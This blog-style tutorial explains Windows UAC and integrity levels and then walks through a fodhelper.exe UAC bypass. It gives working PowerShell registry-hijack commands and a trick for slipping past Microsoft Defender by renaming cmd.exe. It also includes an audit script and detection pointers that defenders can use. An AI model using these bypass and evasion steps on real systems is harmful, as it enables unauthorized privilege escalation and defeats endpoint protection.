# Bypass UAC with Fodhelper

Have you been wondering why, when you want to start a program as administrator or install a new one on your Windows machine, there is a pop-up asking you to select Yes or No? This is called UAC.\
So in this article we will explain:

* What UAC is
* How UAC works
* How we managed to bypass it without any detection

## What is UAC

UAC stands for User Account Control. It is a Windows security feature that forces every new process to run in the security context of a non-privileged account by default, and it ensures that important system changes are made only with approval from a user account that is a member of the Administrators group.\
Here is an example of the UAC pop-up:

<figure><img src="/files/4ucxXwJZAtOgY40LHQN9" alt="" width="275"><figcaption></figcaption></figure>

> You can change the settings from:\
> Control Panel > User Accounts > Change Account Type\
> Control Panel > System and Security > Security and Maintenance > Change User Account Control Settings

## How UAC works

In Windows, files and apps run by default without any administrative permissions. They have the same permissions as a standard user account: they cannot change the operating system, its files, or system settings, and they cannot change files belonging to a user other than the one running them.

<figure><img src="/files/eDSOw1NgXETXJ6IuC3vf" alt="" width="563"><figcaption><p>UAC</p></figcaption></figure>

UAC relies on the four integrity levels used by Windows:

* Low: generally used for interaction with the Internet
* Medium: assigned to standard users and to Administrators' non-elevated tokens
* High: used by Administrators' elevated tokens if UAC is enabled
* System: reserved for system use
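To see which of these levels a given shell is actually running at, the following PowerShell function (an added example, not part of the original article) reads the mandatory label from `whoami /groups` and cross-checks it against the token's Administrator membership. A shell that reports `Medium` with `IsElevated = False` is a normal admin session behind UAC; `High` with `IsElevated = True` is an elevated one:

```powershell
# Added example (not from the original article): report the integrity level of
# the current PowerShell process and whether its token is elevated.

function Get-CurrentIntegrityLevel {
    # 'whoami /groups' lists the mandatory label as a pseudo-group, e.g.
    # "Mandatory Label\High Mandatory Level"; CSV output is easy to parse.
    $groups = whoami /groups /fo csv | ConvertFrom-Csv
    $label  = $groups |
        Where-Object { $_.'Group Name' -like 'Mandatory Label\*' } |
        Select-Object -First 1 -ExpandProperty 'Group Name'

    # Map the label text onto the four levels listed in the article.
    $level = switch -Wildcard ($label) {
        '*Low Mandatory Level*'    { 'Low' }
        '*Medium Mandatory Level*' { 'Medium' }
        '*High Mandatory Level*'   { 'High' }
        '*System Mandatory Level*' { 'System' }
        default                    { 'Unknown' }
    }

    # Cross-check with the token itself: only an elevated (High) admin token
    # satisfies IsInRole(Administrator); a filtered Medium token does not.
    $identity  = [Security.Principal.WindowsIdentity]::GetCurrent()
    $principal = New-Object Security.Principal.WindowsPrincipal($identity)
    $elevated  = $principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)

    [pscustomobject]@{
        ProcessId      = $PID
        User           = $identity.Name
        IntegrityLabel = $label
        IntegrityLevel = $level
        IsElevated     = $elevated
    }
}

Get-CurrentIntegrityLevel | Format-List
```

Run it once in a normal PowerShell window and once in a window started with "Run as administrator" to see the Medium/High split that UAC enforces for the same account.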

## Bypass UAC

Now that we know what UAC is and how it works, our main goal is to evade the pop-up it shows and to escalate our privileges without getting detected by Microsoft Defender. There are several techniques to bypass UAC; in our case we used fodhelper.

> **Fodhelper** is a trusted binary in Windows operating systems that allows elevation without a UAC prompt under most UAC settings.

{% hint style="info" %}
This technique was inspired by this script on GitHub, with small changes:\
<https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1>
{% endhint %}

From that script we can see that the bypass requires you to create a new key in the current user hive, add the DelegateExecute property to the key, and then set a custom value to execute.\
First we create this structure in the registry in order to make fodhelper execute a command with higher privileges:

```powershell
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
```

The value to focus on is `$program` in the third line. Once everything is in place, I changed `$program` to the path of cmd so that it is executed as Administrator:

```powershell
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "c:\Windows\System32\cmd.exe" -Force
```

When we try to launch fodhelper.exe, Microsoft Defender detects it and blocks it:

<figure><img src="/files/asutmOxninslufffq0kC" alt="" width="365"><figcaption></figcaption></figure>

So then I played around with this, and I found out that I can bypass it by copying cmd from C:\Windows\System32\cmd.exe to C:\Users\Fh(any name).exe, i.e. by changing the name and editing the value to point at our cmd, which will evade MD and open a CMD with high integrity:

<figure><img src="/files/kU7vjoY8ZbPy8k3ipXNU" alt=""><figcaption></figcaption></figure>

And here you can see the difference: our cmd (qw) is elevated.

<figure><img src="/files/50otSvK9fZHUtNiFlfYw" alt=""><figcaption></figcaption></figure>
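From the defender's side, both steps above leave artifacts that are easy to check: a per-user `ms-settings\Shell\Open\command` key (Windows does not create one under HKCU on its own) and, in the renamed-binary variant, an executable outside `System32` whose content is byte-identical to `cmd.exe`. The following audit script is an added example, not part of the original article or the referenced GitHub script; the registry path is the one used above, while the list of system binaries to hash-compare and the `-Remove` cleanup switch are my own assumptions:

```powershell
# Added example (not from the original article): audit the per-user registry
# key that fodhelper.exe consults and flag the tampering pattern described
# above. Run it in the user context you want to check; -Remove deletes the key.

$HijackKey = 'HKCU:\Software\Classes\ms-settings\Shell\Open\command'

# Assumption: system binaries an attacker may copy under another name.
$KnownBinaries = @('cmd.exe', 'powershell.exe') |
    ForEach-Object { Join-Path $env:SystemRoot "System32\$_" }

function Get-CommandExecutable {
    # Extract the executable path from a shell command string, honouring quotes.
    param([string]$Command)
    if ($Command -match '^\s*"([^"]+)"') { return $Matches[1] }
    if ($Command -match '^\s*(\S+)')     { return $Matches[1] }
    return $null
}

function Test-FodhelperHijack {
    param([switch]$Remove)

    if (-not (Test-Path -LiteralPath $HijackKey)) {
        return [pscustomobject]@{
            Suspicious = $false
            Command    = $null
            Detail     = 'Key absent: no per-user ms-settings override'
        }
    }

    # The key's mere presence is worth an alert; the values refine the finding.
    $key      = Get-Item -LiteralPath $HijackKey
    $delegate = $key.GetValue('DelegateExecute')
    $command  = $key.GetValue('')      # the (default) value fodhelper would run
    $findings = @("Per-user override key exists: $HijackKey")

    if ($null -ne $delegate) {
        $findings += 'DelegateExecute value present (matches the bypass pattern)'
    }

    $exe = Get-CommandExecutable -Command $command
    if ($exe -and (Test-Path -LiteralPath $exe)) {
        $hash = (Get-FileHash -LiteralPath $exe -Algorithm SHA256).Hash
        foreach ($known in $KnownBinaries) {
            if ((Test-Path -LiteralPath $known) -and
                $hash -eq (Get-FileHash -LiteralPath $known -Algorithm SHA256).Hash) {
                $findings += "Target '$exe' is a byte-identical copy of $known (renamed system binary)"
            }
        }
        if ($exe -notlike "$env:SystemRoot\*") {
            $findings += "Target '$exe' lives outside $env:SystemRoot"
        }
    } elseif ($command) {
        $findings += "Default value set to '$command' (target not found on disk)"
    }

    if ($Remove) {
        # Remove the whole per-user ms-settings subtree the bypass created.
        Remove-Item -LiteralPath 'HKCU:\Software\Classes\ms-settings' -Recurse -Force
        $findings += 'Removed HKCU:\Software\Classes\ms-settings'
    }

    [pscustomobject]@{
        Suspicious = $true
        Command    = $command
        Detail     = ($findings -join '; ')
    }
}

Test-FodhelperHijack | Format-List
```

For continuous detection rather than a one-off audit, the same artifacts map onto standard telemetry: a Sysmon Event ID 13 (registry value set) whose TargetObject ends in `ms-settings\Shell\Open\command`, and a Sysmon Event ID 1 or Windows Security 4688 process-creation event whose parent image is `fodhelper.exe`. MITRE ATT&CK tracks this family of bypasses under T1548.002.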

In the next article we will talk about tokens and how to escalate from Administrator privileges to NT Authority.\
I hope you enjoyed reading it, and always play around \*\_^

{% embed url="<https://learn.microsoft.com/en-us/windows/security/identity-protection/user-account-control/user-account-control-overview>" %}

{% embed url="<https://learn.microsoft.com/en-us/cpp/security/how-user-account-control-uac-affects-your-application?view=msvc-170>" %}

{% embed url="<https://learn.microsoft.com/en-us/windows/win32/secauthz/mandatory-integrity-control>" %}

{% embed url="<https://github.com/winscripting/UAC-bypass/blob/master/FodhelperBypass.ps1>" %}
